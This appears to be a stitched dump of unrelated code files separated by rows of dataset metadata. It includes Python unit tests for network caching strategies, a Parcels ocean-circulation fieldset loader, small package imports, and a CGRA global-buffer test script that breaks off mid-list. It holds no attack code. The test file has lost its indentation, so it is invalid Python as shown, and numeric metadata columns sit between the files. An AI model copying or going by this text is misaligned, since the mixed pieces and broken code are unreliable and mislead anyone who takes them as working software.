self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# receiver 0 requests 2, expect hit in 1
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1)]
exp_cont_hops = [(1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# receiver 0 requests 3, expect miss and eviction of 2 from 3
hr.process_event(1, 0, 3, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(4, loc)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
def test_cl4m(self):
hr = strategy.CacheLessForMore(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# receiver 0 requests 2, expect hit
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2)]
exp_cont_hops = [(2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# receiver 0 requests 3, expect miss
hr.process_event(1, 0, 3, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(1, loc)
self.assertIn(4, loc)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
def test_random_choice(self):
hr = strategy.RandomChoice(self.view, self.controller)
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(4, loc)
summary = self.collector.session_summary()
self.assertEqual(4, summary['serving_node'])
def test_random_bernoulli(self):
hr = strategy.RandomBernoulli(self.view, self.controller)
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertIn(4, loc)
summary = self.collector.session_summary()
self.assertEqual(4, summary['serving_node'])
def test_random_bernoulli_p_0(self):
hr = strategy.RandomBernoulli(self.view, self.controller, p=0)
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertNotIn(1, loc)
self.assertNotIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
self.assertEqual(4, summary['serving_node'])
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertNotIn(1, loc)
self.assertNotIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
self.assertEqual(4, summary['serving_node'])
def test_random_bernoulli_p_1(self):
hr = strategy.RandomBernoulli(self.view, self.controller, p=1)
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
self.assertEqual(4, summary['serving_node'])
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
self.assertEqual(1, summary['serving_node'])
class TestPartition(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
@classmethod
def partition_topology(cls):
#
# +-- s1 --+
# / | \
# c1-----[]----c2
# / \
# r1 r2
#
topo = fnss.Topology()
icr_candidates = ["c1", "router", "c2"]
topo.add_path(icr_candidates)
topo.add_edge("r1", "router")
topo.add_edge("r2", "router")
topo.add_edge("c1", "s1")
topo.add_edge("c2", "s1")
topo.graph['icr_candidates'] = set(icr_candidates)
contents = (1, 2, 3, 4)
for router in icr_candidates:
if router in ("c1", "c2"):
props = {'cache_size': 1}
fnss.add_stack(topo, router, 'router', **props)
for src in ['s1']:
fnss.add_stack(topo, src, 'source', {'contents': contents})
for rcv in ['r1', 'r2']:
fnss.add_stack(topo, rcv, 'receiver')
topo.graph['cache_assignment'] = {"r1": "c1", "r2": "c2"}
return IcnTopology(topo)
def setUp(self):
topology = self.partition_topology()
model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(model)
self.controller = NetworkController(model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test(self):
hr = strategy.Partition(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, "r1", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(2, len(loc))
self.assertIn("s1", loc)
self.assertIn("c1", loc)
self.assertNotIn("c2", loc)
summary = self.collector.session_summary()
exp_req_hops = [("r1", "router"), ("router", "c1"), ("c1", "s1")]
exp_cont_hops = [("s1", "c1"), ("c1", "router"), ("router", "r1")]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual("s1", summary['serving_node'])
# receiver 0 requests 2, expect hit
hr.process_event(1, "r1", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(2, len(loc))
self.assertIn("s1", loc)
self.assertIn("c1", loc)
self.assertNotIn("c2", loc)
summary = self.collector.session_summary()
exp_req_hops = [("r1", "router"), ("router", "c1")]
exp_cont_hops = [("c1", "router"), ("router", "r1")]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual("c1", summary['serving_node'])
# Now try with other partition
hr.process_event(1, "r2", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(3, len(loc))
self.assertIn("s1", loc)
self.assertIn("c1", loc)
self.assertIn("c2", loc)
summary = self.collector.session_summary()
exp_req_hops = [("r2", "router"), ("router", "c2"), ("c2", "s1")]
exp_cont_hops = [("s1", "c2"), ("c2", "router"), ("router", "r2")]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual("s1", summary['serving_node'])
hr.process_event(1, "r2", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(3, len(loc))
self.assertIn("s1", loc)
self.assertIn("c1", loc)
self.assertIn("c2", loc)
summary = self.collector.session_summary()
exp_req_hops = [("r2", "router"), ("router", "c2")]
exp_cont_hops = [("c2", "router"), ("router", "r2")]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual("c2", summary['serving_node'])
class TestNrr(unittest.TestCase):
"""Test suite for Nearest Replica Routing strategies
"""
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
@classmethod
def nrr_topology(cls):
"""Return topology for testing NRR caching strategies
"""
# Topology sketch
#
# 0 ---- 2----- 4
# | \
# | s
# | /
# 1 ---- 3 ---- 5
#
topology = IcnTopology(fnss.Topology())
topology.add_path([0, 2, 4, "s", 5, 3, 1])
topology.add_edge(2, 3)
receivers = (0, 1)
source = "s"
caches = (2, 3, 4, 5)
contents = (1, 2, 3, 4)
fnss.add_stack(topology, source, 'source', {'contents': contents})
for v in caches:
fnss.add_stack(topology, v, 'router', {'cache_size': 1})
for v in receivers:
fnss.add_stack(topology, v, 'receiver', {})
fnss.set_delays_constant(topology, 1, 'ms')
return topology
def setUp(self):
topology = self.nrr_topology()
model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(model)
self.controller = NetworkController(model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test_lce(self):
hr = strategy.NearestReplicaRouting(self.view, self.controller, metacaching='LCE')
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(3, len(loc))
self.assertIn(2, loc)
self.assertIn(4, loc)
self.assertIn("s", loc)
self.assertNotIn(3, loc)
self.assertNotIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 2), (2, 4), (4, "s")]
exp_cont_hops = [("s", 4), (4, 2), (2, 0)]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual("s", summary['serving_node'])
hr.process_event(1, 1, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(4, len(loc))
self.assertIn(2, loc)
self.assertIn(4, loc)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertNotIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [(1, 3), (3, 2)]
exp_cont_hops = [(2, 3), (3, 1)]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual(2, summary['serving_node'])
hr.process_event(1, 1, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(4, len(loc))
self.assertIn(2, loc)
self.assertIn(4, loc)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertNotIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [(1, 3)]
exp_cont_hops = [(3, 1)]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual(3, summary['serving_node'])
def test_lcd(self):
hr = strategy.NearestReplicaRouting(self.view, self.controller, metacaching='LCD')
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(2, len(loc))
self.assertNotIn(2, loc)
self.assertIn(4, loc)
self.assertIn("s", loc)
self.assertNotIn(3, loc)
self.assertNotIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 2), (2, 4), (4, "s")]
exp_cont_hops = [("s", 4), (4, 2), (2, 0)]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual("s", summary['serving_node'])
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(3, len(loc))
self.assertIn(2, loc)
self.assertIn(4, loc)
self.assertIn("s", loc)
self.assertNotIn(3, loc)
self.assertNotIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 2), (2, 4)]
exp_cont_hops = [(4, 2), (2, 0)]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual(4, summary['serving_node'])
hr.process_event(1, 1, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(4, len(loc))
self.assertIn(2, loc)
self.assertIn(4, loc)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertNotIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [(1, 3), (3, 2)]
exp_cont_hops = [(2, 3), (3, 1)]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual(2, summary['serving_node'])
hr.process_event(1, 1, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(4, len(loc))
self.assertIn(2, loc)
self.assertIn(4, loc)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertNotIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [(1, 3)]
exp_cont_hops = [(3, 1)]
self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
self.assertEqual(3, summary['serving_node'])
| 43.843354
| 90
| 0.598855
| 11,054
| 83,127
| 4.324046
| 0.023521
| 0.050086
| 0.038077
| 0.067283
| 0.949914
| 0.942864
| 0.939788
| 0.936336
| 0.935248
| 0.927884
| 0
| 0.035878
| 0.257317
| 83,127
| 1,895
| 91
| 43.866491
| 0.738342
| 0.075607
| 0
| 0.910319
| 0
| 0
| 0.054104
| 0
| 0
| 0
| 0
| 0
| 0.413391
| 1
| 0.041155
| false
| 0.013514
| 0.003071
| 0
| 0.052826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1a276002107901b911a3503cde6ffe83e6c0ed9f
| 5,961
|
py
|
Python
|
low_spatial_res/setfieldsets.py
|
pdnooteboom/PO_res_error
|
2c0e1f12203585e2ca3f9a5e686b4e8004052884
|
[
"MIT"
] | 1
|
2021-04-12T16:07:42.000Z
|
2021-04-12T16:07:42.000Z
|
low_spatial_res/setfieldsets.py
|
pdnooteboom/PO_res_error
|
2c0e1f12203585e2ca3f9a5e686b4e8004052884
|
[
"MIT"
] | null | null | null |
low_spatial_res/setfieldsets.py
|
pdnooteboom/PO_res_error
|
2c0e1f12203585e2ca3f9a5e686b4e8004052884
|
[
"MIT"
] | 1
|
2021-04-12T16:07:45.000Z
|
2021-04-12T16:07:45.000Z
|
from parcels import FieldSet
def set_pop_fieldset(ufiles, dimfiles, dfile, bfile, afile, indices = None):#
filenames = { 'U': {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'V' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'W' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'S' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'T' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles} ,
'B' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':bfile},
'cell_areas' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':afile},
}
variables = {'U': 'UVEL',
'V': 'VVEL',
'W': 'WVEL',
'cell_areas': 'UAREA',
'T': 'TEMP',
'S': 'SALT',
'B':'Bathymetry'}
dimensions = {'U':{'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'V': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'W': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'cell_areas':{'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'T': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'S': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'B': {'lon': 'ULONG', 'lat': 'ULAT'} }
if(indices!=None):
fieldset = FieldSet.from_pop(filenames, variables, dimensions, indices=indices, allow_time_extrapolation=False)
else:
fieldset = FieldSet.from_pop(filenames, variables, dimensions, allow_time_extrapolation=False)
fieldset.U.vmax = 10 # set max of flow to 10 m/s
fieldset.V.vmax = 10
fieldset.W.vmax = 10
fieldset.T.vmin = -5
fieldset.cell_areas.allow_time_extrapolation = True
fieldset.B.allow_time_extrapolation = True
fieldset.cell_areas.set_scaling_factor(0.0001) # cm^2 to m^2
return fieldset
def set_pop_fieldset_bolus(ufiles, dimfiles, dfile, bfile, afile, indices=None):#
filenames = { 'U': {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'V' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'W' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'Ubolus': {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'Vbolus' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'S' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles},
'T' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':ufiles} ,
'B' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':bfile},
'cell_areas' : {'lon': bfile,
'lat': bfile,
'depth': dfile,
'data':afile},
}
variables = {'U': 'UVEL',
'V': 'VVEL',
'W': 'WVEL',
'cell_areas': 'UAREA',
'Ubolus': 'UISOP',
'Vbolus': 'VISOP',
'T': 'TEMP',
'S': 'SALT',
'B':'Bathymetry'}
dimensions = {'U':{'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'V': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'W': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'cell_areas':{'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'Ubolus':{'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'Vbolus': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'T': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'S': {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'},
'B': {'lon': 'ULONG', 'lat': 'ULAT'} }
if(indices!=None):
fieldset = FieldSet.from_pop(filenames, variables, dimensions, indices=indices, allow_time_extrapolation=False)
else:
fieldset = FieldSet.from_pop(filenames, variables, dimensions, allow_time_extrapolation=False)
fieldset.U.vmax = 10 # set max of flow to 10 m/s
fieldset.V.vmax = 10
fieldset.W.vmax = 10
fieldset.Ubolus.set_scaling_factor(0.01) # cm/s to m/s
fieldset.Vbolus.set_scaling_factor(0.01) # cm/s to m/s
fieldset.cell_areas.set_scaling_factor(0.0001) # cm^2/s to m^2/s
fieldset.T.vmin = -5
fieldset.cell_areas.allow_time_extrapolation = True
fieldset.B.allow_time_extrapolation = True
return fieldset
| 41.978873
| 119
| 0.402114
| 551
| 5,961
| 4.246824
| 0.123412
| 0.054701
| 0.075214
| 0.109402
| 0.952991
| 0.931624
| 0.931624
| 0.931624
| 0.916239
| 0.902564
| 0
| 0.011088
| 0.425096
| 5,961
| 141
| 120
| 42.276596
| 0.671725
| 0.017279
| 0
| 0.897638
| 0
| 0
| 0.161423
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015748
| false
| 0
| 0.007874
| 0
| 0.03937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c52caed7197369a95d057967449f9e0ccbda08c1
| 130
|
py
|
Python
|
db_conn/__init__.py
|
szkkteam/db_conn
|
06cf0bc98b92ce542e7475afdd33eb5eb9f27645
|
[
"MIT"
] | null | null | null |
db_conn/__init__.py
|
szkkteam/db_conn
|
06cf0bc98b92ce542e7475afdd33eb5eb9f27645
|
[
"MIT"
] | null | null | null |
db_conn/__init__.py
|
szkkteam/db_conn
|
06cf0bc98b92ce542e7475afdd33eb5eb9f27645
|
[
"MIT"
] | null | null | null |
from db_conn.connection import postgresql as psql
from db_conn import utils
from db_conn import queue
from db_conn import query
| 32.5
| 50
| 0.838462
| 23
| 130
| 4.565217
| 0.478261
| 0.228571
| 0.380952
| 0.457143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 130
| 4
| 51
| 32.5
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c537befe79dc55128d45f621a863431d058c7d05
| 133
|
py
|
Python
|
pyblazing/blazingsql/__init__.py
|
romulo-auccapuclla/blazingsql
|
c85429479cabc0907212e880d590441f25eb3b59
|
[
"Apache-2.0"
] | 1
|
2020-01-11T15:43:22.000Z
|
2020-01-11T15:43:22.000Z
|
pyblazing/blazingsql/__init__.py
|
romulo-auccapuclla/blazingsql
|
c85429479cabc0907212e880d590441f25eb3b59
|
[
"Apache-2.0"
] | 3
|
2020-07-26T05:17:38.000Z
|
2021-03-22T16:36:11.000Z
|
pyblazing/blazingsql/__init__.py
|
romulo-auccapuclla/blazingsql
|
c85429479cabc0907212e880d590441f25eb3b59
|
[
"Apache-2.0"
] | 1
|
2021-03-22T15:59:39.000Z
|
2021-03-22T15:59:39.000Z
|
from pyblazing.apiv2 import S3EncryptionType
from pyblazing.apiv2 import DataType
from pyblazing.apiv2.context import BlazingContext
| 33.25
| 50
| 0.879699
| 16
| 133
| 7.3125
| 0.5
| 0.333333
| 0.461538
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033058
| 0.090226
| 133
| 3
| 51
| 44.333333
| 0.933884
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c546a050342700e48a7a14ed5c101f8fbd5ab6d1
| 19,704
|
py
|
Python
|
apps/hardware_benchmarks/handcrafted/handcrafted_ub_layer_gb/applications.py
|
mfkiwl/Halide-to-Hardware
|
15425bc5c3d7a243de35fe15a3620a7c2c1cf63e
|
[
"MIT"
] | 60
|
2019-01-23T22:35:13.000Z
|
2022-02-09T03:31:30.000Z
|
apps/hardware_benchmarks/handcrafted/handcrafted_ub_layer_gb/applications.py
|
mfkiwl/Halide-to-Hardware
|
15425bc5c3d7a243de35fe15a3620a7c2c1cf63e
|
[
"MIT"
] | 79
|
2019-02-22T03:27:45.000Z
|
2022-02-24T23:03:28.000Z
|
apps/hardware_benchmarks/handcrafted/handcrafted_ub_layer_gb/applications.py
|
mfkiwl/Halide-to-Hardware
|
15425bc5c3d7a243de35fe15a3620a7c2c1cf63e
|
[
"MIT"
] | 12
|
2019-02-21T00:30:31.000Z
|
2021-11-03T17:05:39.000Z
|
import numpy as np
from commands import *
class OneShotValid():
def __init__(self, bitstream, infile, goldfile, outfile, args):
self.bitstream = bitstream
self.infile = infile
self.goldfile = goldfile
self.outfile = outfile
self.args = args
def commands(self):
im = np.fromfile(
self.infile,
dtype=np.uint8
).astype(np.uint16)
gold = np.fromfile(
self.goldfile,
dtype=np.uint8
).astype(np.uint16)
return [
WRITE_REG(GLOBAL_RESET_REG, 1),
# Stall the CGRA
WRITE_REG(STALL_REG, 0b1111),
# Enable interrupts
WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
# WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1), # TODO: removeme
# WRITE_REG(SOFT_RESET_DELAY_REG, 0), # TODO: removeme
# Configure the CGRA
PRINT("Configuring CGRA..."),
# *gc_config_bitstream(self.bitstream),
*gb_config_bitstream(self.bitstream, width=self.args.width),
PRINT("Done."),
# # TODO: Do it again to test the interrupts, but remove later.
# PRINT("Configuring CGRA..."),
# # *gc_config_bitstream(self.bitstream),
# *gb_config_bitstream(self.bitstream, width=self.args.width),
# PRINT("Done."),
# Set up global buffer for pointwise
*configure_io(IO_INPUT_STREAM, BANK_ADDR(0), len(im), width=self.args.width),
# TODO: would be better if this took in the input and
# output tiles of the application and then configured the
# io controllers appropriately.
*configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), io_ctrl=1, width=self.args.width),
# *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
# *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(4), len(gold), width=self.args.width),
# Put image into global buffer
PRINT("Transferring input data..."),
WRITE_DATA(BANK_ADDR(0), 0xc0ffee, im.nbytes, im),
PRINT("Done."),
# Start the application
PRINT("Starting application..."),
WRITE_REG(STALL_REG, 0),
PEND(0b01, "start"),
WRITE_REG(CGRA_START_REG, 1),
PRINT("Waiting for completion..."),
WAIT(0b01, "start"),
PRINT("Done."),
PRINT("Reading output data..."),
READ_DATA(
BANK_ADDR(16),
gold.nbytes,
gold,
_file=self.outfile,
),
PRINT("All tasks complete!"),
]
def verify(self, result=None):
print("Comparing outputs...")
gold = np.fromfile(
self.goldfile,
dtype=np.uint8,
)
if result is None:
result = np.fromfile(
self.outfile,
dtype=np.uint16,
).astype(np.uint8)
if not np.array_equal(gold, result):
if len(gold) != len(result):
print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
for k, (x, y) in enumerate(zip(gold, result)):
if x != y:
print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
return False
print("Outputs match!")
return True
class OneShotStall(OneShotValid):
def commands(self):
im = np.fromfile(
self.infile,
dtype=np.uint8
).astype(np.uint16)
gold = np.fromfile(
self.goldfile,
dtype=np.uint8
).astype(np.uint16)
return [
WRITE_REG(GLOBAL_RESET_REG, 1),
# Stall the CGRA
WRITE_REG(STALL_REG, 0b1111),
# Enable interrupts
WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
# WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1), # TODO: removeme
# WRITE_REG(SOFT_RESET_DELAY_REG, 0), # TODO: removeme
# Configure the CGRA
PRINT("Configuring CGRA..."),
# *gc_config_bitstream(self.bitstream),
*gb_config_bitstream(self.bitstream, width=self.args.width),
PRINT("Done."),
# # TODO: Do it again to test the interrupts, but remove later.
# PRINT("Configuring CGRA..."),
# # *gc_config_bitstream(self.bitstream),
# *gb_config_bitstream(self.bitstream, width=self.args.width),
# PRINT("Done."),
# Set up global buffer for pointwise
*configure_io(IO_INPUT_STREAM, BANK_ADDR(0), len(im), width=self.args.width),
# TODO: would be better if this took in the input and
# output tiles of the application and then configured the
# io controllers appropriately.
*configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), io_ctrl=1, width=self.args.width),
# *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
# *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(4), len(gold), width=self.args.width),
# Put image into global buffer
PRINT("Transferring input data..."),
WRITE_DATA(BANK_ADDR(0), 0xc0ffee, im.nbytes, im),
PRINT("Done."),
# Start the application
PRINT("Starting application..."),
WRITE_REG(STALL_REG, 0),
PEND(0b01, "start"),
WRITE_REG(CGRA_START_REG, 1),
WRITE_REG(STALL_REG, 0b1111), # HACK
STALL(50), # HACK
WRITE_REG(STALL_REG, 0), # HACK
STALL(100), # HACK
WRITE_REG(STALL_REG, 0b1111), # HACK
STALL(50), # HACK
WRITE_REG(STALL_REG, 0), # HACK
STALL(100), # HACK
WRITE_REG(STALL_REG, 0b1111), # HACK
STALL(50), # HACK
WRITE_REG(STALL_REG, 0), # HACK
PRINT("Waiting for completion..."),
WAIT(0b01, "start"),
PRINT("Done."),
PRINT("Reading output data..."),
READ_DATA(
BANK_ADDR(16),
gold.nbytes,
gold,
_file=self.outfile,
),
PRINT("All tasks complete!"),
]
class Tiled():
def __init__(self, bitstream, infiles, goldfiles, outfiles, args):
self.bitstream = bitstream
self.infiles = infiles
self.goldfiles = goldfiles
self.outfiles = outfiles
self.args = args
def commands(self):
ims = [
np.fromfile(
infile,
dtype=np.uint8
).astype(np.uint16)
for infile in self.infiles
]
golds = [
np.fromfile(
goldfile,
dtype=np.uint8
).astype(np.uint16)
for goldfile in self.goldfiles
]
command_list = [
WRITE_REG(GLOBAL_RESET_REG, 1),
# Stall the CGRA
WRITE_REG(STALL_REG, 0b1111),
# Enable interrupts
WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
# WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1), # TODO: removeme
# WRITE_REG(SOFT_RESET_DELAY_REG, 0), # TODO: removeme
# Configure the CGRA
PRINT("Configuring CGRA..."),
